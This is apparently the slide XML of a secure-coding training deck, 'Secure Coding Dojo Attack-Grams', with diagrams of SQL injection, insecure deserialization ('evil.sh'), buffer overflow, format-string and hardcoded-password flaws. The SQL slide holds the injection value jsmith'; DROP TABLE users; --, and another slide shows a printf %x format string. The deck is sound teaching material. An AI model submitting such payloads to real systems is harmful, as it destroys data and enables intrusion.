              <a:t>SELECT * FROM users WHERE user='</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>jsmith'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2445120" y="5101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SQL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70880" cy="1665720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="353" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="4404960"/>
            <a:ext cx="1049760" cy="1548360"/>
            <a:chOff x="1329120" y="4404960"/>
            <a:chExt cx="1049760" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="354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40496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5" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="5315040"/>
              <a:ext cx="10497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56" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="354" idx="0"/>
            <a:endCxn id="352" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1391400" y="3981240"/>
            <a:ext cx="841320" cy="648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57" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616040" y="3928680"/>
            <a:ext cx="383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jsmith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'; DROP TABLE users;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>--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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196640" y="1582560"/>
            <a:ext cx="111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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5062680" y="1701000"/>
            <a:ext cx="2426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SQL Database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0" name="Curved Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379240" y="2623680"/>
            <a:ext cx="3394080" cy="13680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013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61" name="Can 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772600" y="2130840"/>
            <a:ext cx="1134720" cy="119628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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="362" name="Curved Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2379240" y="2949480"/>
            <a:ext cx="3394080" cy="21600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013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63" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3371760" y="2729160"/>
            <a:ext cx="152172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c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>DROP TABLE users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Picture 26" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="82197" t="2808" r="2087" b="69373"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084000" y="2427840"/>
            <a:ext cx="515520" cy="644760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5958720" y="3003120"/>
            <a:ext cx="766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6" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6145920" y="2644920"/>
            <a:ext cx="357480" cy="325800"/>
            <a:chOff x="6145920" y="2644920"/>
            <a:chExt cx="357480" cy="325800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="367" name="Straight Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6145920" y="2644920"/>
              <a:ext cx="357840" cy="326160"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="ff0000"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="368" name="Straight Connector 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6145920" y="2644920"/>
              <a:ext cx="357840" cy="326160"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="ff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9" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785760" y="2090880"/>
            <a:ext cx="1577160" cy="125064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3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307160" y="697680"/>
            <a:ext cx="1213200" cy="113868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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2781720" y="692640"/>
            <a:ext cx="1693800" cy="114912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" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736160" y="692640"/>
            <a:ext cx="1653480" cy="118260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6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803280" y="698760"/>
            <a:ext cx="1908720" cy="132192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7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126000" y="696600"/>
            <a:ext cx="1806480" cy="131436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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192320" y="2090880"/>
            <a:ext cx="2250720" cy="135144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10" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736240" y="2090880"/>
            <a:ext cx="1747080" cy="124704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11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7738920" y="2125800"/>
            <a:ext cx="1582920" cy="146880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12" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9720360" y="2090880"/>
            <a:ext cx="1175760" cy="108936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13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576440" y="3556440"/>
            <a:ext cx="1389600" cy="135000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14" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503160" y="3579480"/>
            <a:ext cx="1490400" cy="125460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15" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430600" y="3576600"/>
            <a:ext cx="1378800" cy="1309320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243560" y="3593520"/>
            <a:ext cx="1389600" cy="132840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17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9061560" y="3600720"/>
            <a:ext cx="1189080" cy="132120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18" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476000" y="5137200"/>
            <a:ext cx="1410480" cy="123300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19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3421080" y="5071680"/>
            <a:ext cx="1439640" cy="1174320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468920" y="5084280"/>
            <a:ext cx="1088640" cy="89640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21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9068040" y="5075640"/>
            <a:ext cx="1514520" cy="870480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191400" cy="451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DejaVu Sans"/>
              </a:rPr>
              <a:t>Secure Coding Dojo Attack-Grams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Picture 24" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442840" y="5071680"/>
            <a:ext cx="1305360" cy="121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99120" y="284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Insecure Deserialization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0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23760" y="1567440"/>
            <a:ext cx="1370880" cy="1665720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="371" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2037600" y="4613760"/>
            <a:ext cx="1049760" cy="1548720"/>
            <a:chOff x="2037600" y="4613760"/>
            <a:chExt cx="1049760" cy="1548720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="372" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2048040" y="461376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3" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2037600" y="5524200"/>
              <a:ext cx="10497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74" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="372" idx="0"/>
            <a:endCxn id="370" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2275920" y="3480840"/>
            <a:ext cx="1380960" cy="885600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2498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75" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732040" y="1240200"/>
            <a:ext cx="135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Book Store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Graphic 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3088080" y="2468520"/>
            <a:ext cx="480960" cy="493920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462240" y="2971440"/>
            <a:ext cx="15649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Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh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Graphic 63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506600" y="3782520"/>
            <a:ext cx="574200" cy="574200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="379" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3791880" y="4389480"/>
            <a:ext cx="1686960" cy="1498680"/>
            <a:chOff x="3791880" y="4389480"/>
            <a:chExt cx="1686960" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="380" name="Graphic 24" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3902400" y="438948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1" name="Graphic 25" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4237920" y="457308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2" name="TextBox 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3791880" y="5524200"/>
              <a:ext cx="1686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83" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1305360" y="4389480"/>
            <a:ext cx="1301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Command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84" name="Curved Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="380" idx="0"/>
            <a:endCxn id="370" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="3315600" y="3326760"/>
            <a:ext cx="1156680" cy="969480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="595959">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Graphic 32" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754160" y="3549960"/>
            <a:ext cx="872280" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907520" y="4323240"/>
            <a:ext cx="88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Book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261440" y="4172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Buffer Overflow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672720" y="1894320"/>
            <a:ext cx="2026080" cy="2461320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="389" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="2649240"/>
            <a:ext cx="1049760" cy="1548360"/>
            <a:chOff x="1329120" y="2649240"/>
            <a:chExt cx="1049760" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="390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264924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1" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="3559320"/>
              <a:ext cx="10497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92" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="390" idx="3"/>
            <a:endCxn id="388" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2291040" y="3124800"/>
            <a:ext cx="1382040" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013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93" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2172600" y="2702520"/>
            <a:ext cx="1177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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021200" y="1530720"/>
            <a:ext cx="111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Box 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046400" y="2500920"/>
            <a:ext cx="1156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i!\0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 String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6080" cy="2461320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="398" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061280" y="2640240"/>
            <a:ext cx="1049760" cy="1548720"/>
            <a:chOff x="1061280" y="2640240"/>
            <a:chExt cx="1049760" cy="1548720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="399" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1071720" y="264024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0" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1061280" y="3550680"/>
              <a:ext cx="10497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01" name="Curved Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="399" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2023560" y="3111120"/>
            <a:ext cx="968760" cy="5400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38959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02" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198880" y="2760120"/>
            <a:ext cx="49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%x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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226320" y="1640160"/>
            <a:ext cx="111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TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048840" y="2910600"/>
            <a:ext cx="147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5" name="Curved Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1087200" cy="13320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25041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06" name="TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4497840" y="2726280"/>
            <a:ext cx="141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printf("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%x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Picture 13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639760" y="2492640"/>
            <a:ext cx="1074240" cy="1264320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5679720" y="2092680"/>
            <a:ext cx="965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 file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TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875560" y="2894760"/>
            <a:ext cx="574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Hardcoded Password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Picture 1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6080" cy="2461320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="412" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="989280" y="2640240"/>
            <a:ext cx="1224360" cy="1365120"/>
            <a:chOff x="989280" y="2640240"/>
            <a:chExt cx="1224360" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="413" name="Graphic 1" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1001520" y="2640240"/>
              <a:ext cx="1110240" cy="1046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4" name="TextBox 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="989280" y="3641400"/>
              <a:ext cx="12243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15" name="Curved Connector 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2023920" y="3111120"/>
            <a:ext cx="968400" cy="5760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25027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16" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226320" y="1640160"/>
            <a:ext cx="111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Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048840" y="2910600"/>
            <a:ext cx="147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18" name="Curved Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1087200" cy="13320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25041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19" name="TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433400" y="2726280"/>
            <a:ext cx="15418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20" name="Picture 2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783760" y="2492640"/>
            <a:ext cx="1074240" cy="1264320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744520" y="1828800"/>
            <a:ext cx="1247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Privileged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TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892040" y="2726280"/>
            <a:ext cx="574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g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4" name="Picture 22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6080" cy="2461320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="425" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="701280" y="2532240"/>
            <a:ext cx="1224360" cy="1365120"/>
            <a:chOff x="701280" y="2532240"/>
            <a:chExt cx="1224360" cy="1365120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="426" name="Graphic 2" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
